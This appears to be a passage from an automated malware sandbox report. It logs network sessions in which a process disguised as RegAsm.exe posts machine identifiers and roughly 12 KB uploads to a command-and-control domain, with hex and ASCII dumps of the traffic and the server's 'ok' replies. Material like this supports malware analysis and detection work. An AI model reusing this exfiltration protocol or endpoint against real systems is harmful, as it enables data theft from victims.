2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 66 72 70 2b 54 31 67 61 6e 6d 59 74 64 55 39 42 5a 5a 66 33 59 63 76 45 76 39 69 32 64 62 58 6f 6a 51 64 41 68 78 59 51 76 47 58 4b 6e 4b 69 49 36 4f 74 4c 59 78 6d 58 76 34 45 56 6b 74 64 30 2f 71 56 2b 61 44 4f 56 31 49 79 73 30 69 53 79 4d 69 51 73 55 62 72 64 36 43 6b 6f 48 6f 35 48 71 41 5a 72 67 54 52 6e 68 32 48 4c 78 46 2b 34 74 6e 57 31 36 49 30 48 52 35 66 55 6b 73 71 52 65 39 6a 39 66 63 67 5a 4f 6c 4e 4a 74 71 6f 67 51 47 54 54 49 42 71 55 72 73 69 32 73 64 4a 2b 36 33 64 45 42 7a 65 51 57 52 47 63 32 6b 35 4e 37 46 74 2b 5a 69 31 7a 33 6d 54 68 34 2b 62 6c 33 34 4c 6f 61 54 5a 54 73 6b 6e 4c 52 66 4c 58 4d 33 42 35 6f 56 39 34 48 6e 39 61 72 6d 74 48 72 4e 4c 2f 52 53 53 48 38 72 43 36 6c 51 37 73 73 56 62 55 36 49 30 33 68 49 4f 43 46 41 30 Data Ascii: frp+T1ganmYtdU9BZZf3YcvEv9i2dbXojQdAhxYQvGXKnKiI6OtLYxmXv4EVktd0/qV+aDOV1Iys0iSyMiQsUbrd6CkoHo5HqAZrgTRnh2HLxF+4tnW16I0HR5fUksqRe9j9fcgZOlNJtqogQGTTIBqUrsi2sdJ+63dEBzeQWRGc2k5N7Ft+Zi1z3mTh4+bl34LoaTZTsknLRfLXM3B5oV94Hn9armtHrNL/RSSH8rC6lQ7ssVbU6I03hIOCFA0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49720	188.114.96.3	443	4340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:05 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: employhabragaomlsp.shop
2024-05-23 22:22:05 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-23 22:22:06 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gtssvbb14igcjppdot0vqikd1l; expires=Mon, 16-Sep-2024 16:08:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sR5EpNsC1WcOwwKL%2FKftONEkaBrKu3z18DaErWh8MDPSF3aVgom0hgh2kQoTDWw6x75gjm4EXlSmta4b242DFcunc7jyq3fure3%2BHoSOdoCnBy5bQEHAE1aZuwN1%2F9PSSeOwvdK%2B1gozw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887156cfe28cad-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:06 UTC	555	IN	Data Raw: 31 66 62 31 0d 0a 65 57 4d 6a 73 52 67 62 71 68 30 4c 70 53 45 54 31 65 41 54 64 59 34 7a 52 61 73 44 76 63 69 63 52 34 33 4d 46 41 4b 6a 30 42 45 43 61 53 71 54 62 6a 6d 51 50 54 2b 4a 4b 78 72 33 6b 33 5a 58 74 42 4d 78 32 58 62 59 35 4a 5a 4f 72 36 31 77 49 4a 6e 77 64 78 67 50 55 4e 51 30 45 61 4d 2f 5a 74 30 44 4b 66 57 37 47 58 7a 31 4f 55 79 69 49 64 69 6d 76 6e 32 74 37 6d 4e 6e 77 62 56 70 44 51 5a 4e 77 6e 46 30 78 46 31 6d 77 46 56 79 75 49 46 67 48 71 42 61 4b 6f 6b 76 74 38 47 56 5a 65 69 32 4e 6a 69 44 38 6c 77 63 46 30 4c 38 65 57 6a 42 50 79 65 76 4b 42 72 33 68 57 64 58 74 42 4e 6e 39 79 48 4e 71 65 34 6d 34 4c 39 49 49 4a 6d 72 54 56 73 4b 56 39 52 71 65 74 35 30 5a 4d 74 53 54 2f 66 61 4a 55 57 2b 41 33 57 62 66 70 2f 43 6c 54 71 48 78 Data Ascii: 1fb1eWMjsRgbqh0LpSET1eATdY4zRasDvcicR43MFAKj0BECaSqTbjmQPT+JKxr3k3ZXtBMx2XbY5JZOr61wIJnwdxgPUNQ0EaM/Zt0DKfW7GXz1OUyiIdimvn2t7mNnwbVpDQZNwnF0xF1mwFVyuIFgHqBaKokvt8GVZei2NjiD8lwcF0L8eWjBPyevKBr3hWdXtBNn9yHNqe4m4L9IIJmrTVsKV9Rqet50ZMtST/faJUW+A3Wbfp/ClTqHx
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 67 75 71 38 6e 51 58 51 52 6d 52 4f 6e 2f 47 66 6d 54 48 55 58 6d 38 69 58 51 46 35 31 67 71 78 47 48 53 6f 50 45 6d 37 36 6c 38 61 73 36 34 64 78 59 4d 52 39 4e 36 4f 59 59 58 41 71 77 44 64 71 2f 43 4b 56 57 73 63 69 4c 5a 5a 74 4f 38 76 42 2b 76 78 68 31 2f 6a 39 6b 78 57 57 6b 71 79 68 49 53 6f 7a 39 75 79 77 4d 70 39 63 4a 35 45 75 39 53 4c 4d 5a 69 31 36 48 73 4a 66 32 6f 65 32 58 54 74 48 59 56 43 30 4c 42 63 48 66 4f 66 47 44 4d 53 6e 53 77 68 6a 46 5a 68 44 70 4d 69 57 62 48 36 71 5a 6e 72 34 39 37 61 38 32 34 5a 42 74 42 4b 62 68 6c 4e 36 41 55 63 4b 38 6f 47 76 65 46 66 56 65 30 45 32 66 4e 59 4e 75 72 2b 69 76 68 71 6e 70 6d 7a 37 39 38 48 51 74 42 31 48 42 78 77 48 35 6b 7a 45 78 78 73 6f 39 31 45 65 42 51 49 6f 6b 76 74 38 47 56 5a 65 69 32 Data Ascii: guq8nQXQRmROn/GfmTHUXm8iXQF51gqxGHSoPEm76l8as64dxYMR9N6OYYXAqwDdq/CKVWsciLZZtO8vB+vxh1/j9kxWWkqyhISoz9uywMp9cJ5Eu9SLMZi16HsJf2oe2XTtHYVC0LBcHfOfGDMSnSwhjFZhDpMiWbH6qZnr497a824ZBtBKbhlN6AUcK8oGveFfVe0E2fNYNur+ivhqnpmz798HQtB1HBxwH5kzExxso91EeBQIokvt8GVZei2
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 74 32 46 42 4e 4c 33 33 74 72 7a 33 5a 67 7a 55 4a 2f 75 49 6c 39 45 76 35 61 4b 4d 46 75 33 71 66 7a 4c 75 75 75 4e 69 36 70 32 52 68 62 42 6c 6d 54 49 6a 75 49 58 6d 54 49 55 58 4b 6d 77 45 51 55 34 6c 38 67 33 79 47 33 77 65 46 72 68 38 56 76 43 4b 72 5a 4d 78 77 4e 41 59 73 34 4f 63 6c 7a 5a 63 5a 4d 64 37 32 4b 63 68 62 2b 57 43 6a 42 62 74 61 72 2f 53 48 75 70 47 52 79 77 62 35 68 46 77 74 48 33 48 64 31 69 44 45 42 72 43 67 78 73 4a 6f 78 54 36 34 52 44 63 70 31 33 4b 43 38 45 4f 79 67 65 47 66 58 38 68 74 77 48 67 2b 37 45 57 43 67 46 41 4b 48 52 48 33 33 32 6a 4e 58 34 56 41 76 7a 33 50 51 70 2f 30 72 34 61 46 7a 62 38 6d 79 63 78 59 45 52 64 68 78 65 73 56 37 65 38 31 44 65 62 4b 44 65 78 32 73 48 30 2b 69 43 70 2b 74 35 6d 57 33 37 44 5a 52 31 Data Ascii: t2FBNL33trz3ZgzUJ/uIl9Ev5aKMFu3qfzLuuuNi6p2RhbBlmTIjuIXmTIUXKmwEQU4l8g3yG3weFrh8VvCKrZMxwNAYs4OclzZcZMd72Kchb+WCjBbtar/SHupGRywb5hFwtH3Hd1iDEBrCgxsJoxT64RDcp13KC8EOygeGfX8htwHg+7EWCgFAKHRH332jNX4VAvz3PQp/0r4aFzb8mycxYERdhxesV7e81DebKDex2sH0+iCp+t5mW37DZR1
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 47 54 64 74 2f 64 73 35 36 5a 4d 42 49 63 71 57 51 63 68 50 69 58 57 65 48 43 62 54 42 76 69 4c 33 37 69 34 69 67 5a 64 6b 47 42 46 48 30 44 6f 52 6f 32 41 6e 72 79 68 6f 33 2b 6b 61 56 2b 74 64 5a 35 45 6a 6e 36 72 77 4b 65 53 70 66 57 76 46 74 6e 4d 57 43 6b 2f 64 63 33 58 41 63 32 37 56 54 6e 53 2f 69 48 67 53 34 46 77 6b 32 32 4c 65 36 72 42 4e 68 4d 55 32 5a 39 6e 79 4b 31 6c 42 5a 75 42 4e 57 6f 67 58 41 74 67 4e 47 64 79 62 47 58 79 48 45 53 44 46 49 59 66 6f 76 69 54 6e 71 58 68 6b 30 37 78 68 46 51 5a 42 31 58 4a 78 7a 33 4e 6e 79 56 46 35 74 6f 4a 2f 47 4f 52 59 49 38 68 6c 32 36 62 35 5a 61 48 47 48 51 75 42 74 57 74 62 57 51 4f 54 55 6e 72 53 5a 53 76 70 53 48 47 77 6b 6d 63 4d 72 44 6c 4d 31 69 2b 33 77 65 64 4e 68 4d 55 32 5a 38 33 79 4b 31 Data Ascii: GTdt/ds56ZMBIcqWQchPiXWeHCbTBviL37i4igZdkGBFH0DoRo2Anryho3+kaV+tdZ5Ejn6rwKeSpfWvFtnMWCk/dc3XAc27VTnS/iHgS4Fwk22Le6rBNhMU2Z9nyK1lBZuBNWogXAtgNGdybGXyHESDFIYfoviTnqXhk07xhFQZB1XJxz3NnyVF5toJ/GORYI8hl26b5ZaHGHQuBtWtbWQOTUnrSZSvpSHGwkmcMrDlM1i+3wedNhMU2Z83yK1
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 64 48 58 44 64 47 4c 45 53 58 69 30 6a 6e 63 57 34 6c 45 70 79 53 47 52 77 70 56 4f 72 36 6c 75 49 4a 6e 77 4d 7a 73 4b 56 38 5a 35 61 63 35 34 5a 59 63 72 47 71 6a 4d 47 58 7a 31 4f 55 79 69 49 64 69 6d 76 6e 32 74 37 6e 68 79 78 62 4e 7a 45 77 68 4e 32 48 4a 72 7a 33 68 69 79 55 31 36 73 34 35 34 48 4f 56 55 4b 38 68 71 31 71 2f 36 4c 2b 6d 6a 4e 69 36 70 32 52 68 62 42 6c 6d 54 49 6a 75 49 55 32 72 49 53 44 48 66 36 57 35 5a 68 44 6f 2b 6f 51 71 30 36 76 6b 70 72 2f 59 30 49 4d 61 36 65 78 55 43 52 39 68 32 64 63 6c 32 62 38 4a 4c 64 72 69 46 65 42 44 73 56 7a 58 4f 62 4e 61 71 39 53 7a 6c 71 6e 64 72 67 66 77 62 63 47 6f 42 31 47 49 35 6b 44 30 70 39 55 52 6e 70 34 45 78 66 34 64 4f 61 61 49 4a 74 4c 4f 57 54 6f 54 75 63 57 79 42 36 6a 46 62 44 46 50 Data Ascii: dHXDdGLESXi0jncW4lEpySGRwpVOr6luIJnwMzsKV8Z5ac54ZYcrGqjMGXz1OUyiIdimvn2t7nhyxbNzEwhN2HJrz3hiyU16s454HOVUK8hq1q/6L+mjNi6p2RhbBlmTIjuIU2rISDHf6W5ZhDo+oQq06vkpr/Y0IMa6exUCR9h2dcl2b8JLdriFeBDsVzXObNaq9SzlqndrgfwbcGoB1GI5kD0p9URnp4Exf4dOaaIJtLOWToTucWyB6jFbDFP
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 43 63 72 68 30 4a 39 75 49 46 2b 46 4f 39 51 4c 64 74 7a 30 36 50 32 49 4f 4f 6c 65 47 62 54 74 48 77 53 41 6b 4c 61 66 58 48 45 64 57 72 41 41 7a 2f 66 36 52 70 58 36 30 6c 6e 6b 53 4f 66 69 65 6b 31 34 75 34 65 43 39 37 38 47 33 41 59 4b 62 67 52 4f 63 39 7a 4b 5a 38 42 4d 62 2b 50 65 52 33 6f 56 69 72 4f 5a 39 61 34 39 79 44 68 72 6e 4a 72 7a 72 52 33 47 41 46 54 31 58 35 78 79 33 4a 6b 79 55 42 31 39 38 77 5a 66 49 63 52 49 4e 45 68 68 2b 69 2b 46 2b 4b 67 62 57 2f 47 6f 33 6c 62 61 53 72 4d 4e 42 47 6a 5a 67 47 73 4b 44 47 77 6a 6a 46 50 72 68 45 6a 78 33 50 55 71 2f 55 75 34 61 6c 35 5a 63 75 79 66 42 38 43 54 39 68 37 65 73 42 79 5a 4d 6c 4a 65 4c 36 46 66 52 50 72 45 57 6d 68 43 72 54 71 2b 54 32 76 39 6a 51 67 36 70 4e 65 4e 77 5a 62 6b 78 49 53 Data Ascii: Ccrh0J9uIF+FO9QLdtz06P2IOOleGbTtHwSAkLafXHEdWrAAz/f6RpX60lnkSOfiek14u4eC978G3AYKbgROc9zKZ8BMb+PeR3oVirOZ9a49yDhrnJrzrR3GAFT1X5xy3JkyUB198wZfIcRINEhh+i+F+KgbW/Go3lbaSrMNBGjZgGsKDGwjjFPrhEjx3PUq/Uu4al5ZcuyfB8CT9h7esByZMlJeL6FfRPrEWmhCrTq+T2v9jQg6pNeNwZbkxIS
2024-05-23 22:22:06 UTC	721	IN	Data Raw: 42 50 5a 37 79 44 63 67 48 68 51 57 65 68 43 73 44 6b 6c 6b 37 32 78 68 30 4c 67 62 56 2f 57 31 6b 44 6b 33 78 77 7a 6e 68 76 79 56 46 30 73 59 31 2b 48 75 56 56 4c 38 70 68 32 36 37 35 49 4f 79 69 66 57 66 43 76 58 63 53 44 30 6a 63 4f 6a 65 67 46 41 4b 48 52 47 6e 33 32 6a 4e 58 7a 55 6f 6b 78 57 79 66 77 70 55 36 6f 63 59 64 65 61 6e 5a 47 46 73 47 54 5a 4d 69 4f 34 68 7a 5a 38 4a 44 65 37 47 47 64 42 48 6d 56 43 66 43 59 74 43 75 2b 43 48 67 72 6e 31 70 77 4c 52 32 45 51 70 48 33 6e 6c 2f 7a 6a 38 6e 72 79 67 61 39 34 56 70 56 37 51 54 5a 2b 6c 36 30 71 62 35 5a 59 66 46 61 53 36 70 32 57 70 7a 61 69 71 54 66 58 57 49 4a 79 75 48 53 48 32 7a 68 58 45 61 37 31 6b 69 7a 57 76 61 71 76 59 33 35 36 35 78 63 74 4f 79 65 68 34 4e 51 74 4e 2b 66 38 46 35 61 Data Ascii: BPZ7yDcgHhQWehCsDklk72xh0LgbV/W1kDk3xwznhvyVF0sY1+HuVVL8ph2675IOyifWfCvXcSD0jcOjegFAKHRGn32jNXzUokxWyfwpU6ocYdeanZGFsGTZMiO4hzZ8JDe7GGdBHmVCfCYtCu+CHgrn1pwLR2EQpH3nl/zj8nryga94VpV7QTZ+l60qb5ZYfFaS6p2WpzaiqTfXWIJyuHSH2zhXEa71kizWvaqvY3565xctOyeh4NQtN+f8F5a
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 31 65 30 33 0d 0a 33 66 49 50 79 65 76 4b 42 72 33 68 57 6c 58 74 42 4e 6e 36 6e 62 4a 6f 4f 56 6c 68 38 56 70 4c 71 6e 5a 61 6e 4e 71 4b 70 4e 39 64 59 67 6e 4b 34 64 4f 64 72 6d 4b 64 78 6e 71 51 79 76 47 5a 39 2b 72 39 43 6a 6a 70 58 46 75 79 72 52 32 46 67 46 48 31 58 35 39 7a 48 46 71 68 77 30 5a 33 4f 6b 78 45 50 51 52 66 34 73 68 2b 49 66 50 5a 38 79 35 59 47 72 47 76 6d 55 51 41 45 4c 46 64 32 6d 49 46 77 4c 59 44 52 6e 63 6d 78 6c 38 68 78 45 67 78 53 47 48 36 4c 34 75 34 61 74 33 62 4d 75 31 66 51 6b 41 53 39 39 37 66 73 39 30 65 38 78 52 65 72 2b 42 66 78 2f 6c 55 53 6e 4a 59 4e 4b 71 76 6d 75 48 78 52 30 67 78 71 6f 7a 51 30 4d 42 39 6c 6c 75 33 6e 55 72 35 46 52 6e 76 59 56 39 41 65 64 51 4a 4e 39 73 7a 2b 71 57 54 76 44 67 48 67 76 59 32 68 Data Ascii: 1e033fIPyevKBr3hWlXtBNn6nbJoOVlh8VpLqnZanNqKpN9dYgnK4dOdrmKdxnqQyvGZ9+r9CjjpXFuyrR2FgFH1X59zHFqhw0Z3OkxEPQRf4sh+IfPZ8y5YGrGvmUQAELFd2mIFwLYDRncmxl8hxEgxSGH6L4u4at3bMu1fQkAS997fs90e8xRer+Bfx/lUSnJYNKqvmuHxR0gxqozQ0MB9llu3nUr5FRnvYV9AedQJN9sz+qWTvDgHgvY2h
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 32 48 73 35 68 68 63 43 72 41 4e 33 39 39 6f 7a 52 36 49 35 54 4b 49 68 32 37 75 2b 66 61 33 2b 4a 44 75 55 34 53 52 4c 55 79 6d 34 5a 54 65 67 46 48 43 76 4b 42 72 33 6c 44 46 50 72 67 4e 70 6f 51 71 30 36 75 78 6c 74 2b 77 32 4a 38 2b 2f 63 68 67 50 51 73 46 6f 66 38 74 70 61 6f 42 39 54 35 61 50 65 68 76 68 58 69 7a 33 58 2f 36 6e 39 53 6e 69 6f 58 31 65 2f 36 64 77 46 51 39 47 78 57 73 35 68 68 63 43 72 41 4e 2b 39 39 6f 7a 4c 71 77 5a 5a 2f 59 76 74 38 47 56 5a 66 66 75 4c 69 4b 42 68 33 41 56 44 30 62 46 61 7a 54 70 63 6d 4c 4c 54 6e 36 38 77 6a 39 2f 68 7a 70 6e 7a 79 47 48 36 4b 35 72 68 38 55 64 49 4d 57 6a 4d 30 4e 44 45 59 45 68 4c 4a 73 6f 4f 5a 55 72 47 71 6a 4d 47 58 7a 31 4f 55 79 69 49 63 6e 71 70 6d 65 39 34 42 34 4c 71 76 4a 68 57 31 6b Data Ascii: 2Hs5hhcCrAN399ozR6I5TKIh27u+fa3+JDuU4SRLUym4ZTegFHCvKBr3lDFPrgNpoQq06uxlt+w2J8+/chgPQsFof8tpaoB9T5aPehvhXiz3X/6n9SnioX1e/6dwFQ9GxWs5hhcCrAN+99ozLqwZZ/Yvt8GVZffuLiKBh3AVD0bFazTpcmLLTn68wj9/hzpnzyGH6K5rh8UdIMWjM0NDEYEhLJsoOZUrGqjMGXz1OUyiIcnqpme94B4LqvJhW1k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49721	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:06 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: employhabragaomlsp.shop
2024-05-23 22:22:06 UTC	12854	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:06 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7r6k52der71vg75hlf5p53hf58; expires=Mon, 16-Sep-2024 16:08:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gmt8uNTBqnYBYPm%2FnjNhAq2fsVxCZj6I3HKyAhfotrTHL7IFTDncQcuNa%2FzQ2VuNm19UYuMhF8gMCGg0oaERjhkfw2uY%2Bkke20pvXSoKsicGZOZDqZcSkc0hC3h6rSHq2r%2F5hAnpK0eq4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887159b8634310-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49722	188.114.96.3	443	4340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:06 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: employhabragaomlsp.shop
2024-05-23 22:22:06 UTC	12854	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:08 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=togi3926uv0me3n10eop19ip7q; expires=Mon, 16-Sep-2024 16:08:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qic8M4tsuqs8e56g%2FTHgHvhmKyBodRDWLzxfsvIJnlQ03Mke1v09CyHbsrubmECly6wl213QBPxcBLY7CSOCsqxhFLtovAkTQ1JqU7rtoGs9Gs7epTfk8L%2FLHB6Xc%2BlTPfsS1hc0QKog2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8888715d08187ca6-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49723	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:07 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: employhabragaomlsp.shop
2024-05-23 22:22:07 UTC	12854	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:08 UTC	818	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1252rsumk0q2lp2b5pn75vsqvd; expires=Mon, 16-Sep-2024 16:08:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VVLDTJymzdjhOlzuP1sSaco%2FH6PHO4v2ZDPha3ac9cCa%2BijKeaH6jeBKsV6jE%2B2Ttyv5YyVBXq2PZR%2Bc4JFp4p%2F6fEzChP7jDvVdUEguAYhv0BVhA3P61a8c%2BSnuGaRs6oQZVoBWEYfTZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8888715f6c73c348-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49724	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
